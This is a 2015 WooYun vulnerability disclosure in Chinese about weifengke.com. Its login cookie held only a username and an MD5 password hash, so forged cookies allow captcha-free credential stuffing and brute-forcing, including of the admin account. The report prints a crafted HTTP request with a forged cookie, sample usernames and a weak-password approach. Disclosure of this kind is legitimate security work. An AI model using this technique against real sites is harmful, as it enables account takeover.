当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129327

漏洞标题:微疯客设计缺陷导致撞库和后台爆破

相关厂商:weifengke.com

漏洞作者: xtnnd

提交时间:2015-07-26 20:19

修复时间:2015-09-11 15:50

公开时间:2015-09-11 15:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-26: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

安全我是认真的 不上首页就少给点rank。

详细说明:

首先 登录看下cookie是什么样的

QQ截图20150725205046.jpg


由 username password id组成
但是id不是登录判断凭证
我们访问主页 自己构造cookie

GET / HTTP/1.1
Host: www.weifengke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: wfk[username]='用户名'; wfk[password]='md5加密';
DNT: 1
Connection: keep-alive


22.jpg


成功登录了呢
找了常用的用户名爆破:
当然可以写个爬虫 爬用户名再尝试若口令
abcde
betty
adidas
daniel
chester
alexander

wfk[password]="123456的md5加密"

QQ截图20150725204141.jpg


http://admin.weifengke.com/User/login
这是管理员的登录页面 验证码并不能绕过。
但是用上面的方法 就可以绕过验证码 达到爆破了
'微疯客客服'这个帐号 并不是弱口令
所以没爆破出来

漏洞证明:

修复方案:

你们懂

版权声明:转载请注明来源 xtnnd@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-07-28 15:49

厂商回复:

提供了暴力破解的一个途径,对系统本身影响力度一般,多谢提醒

最新状态:

暂无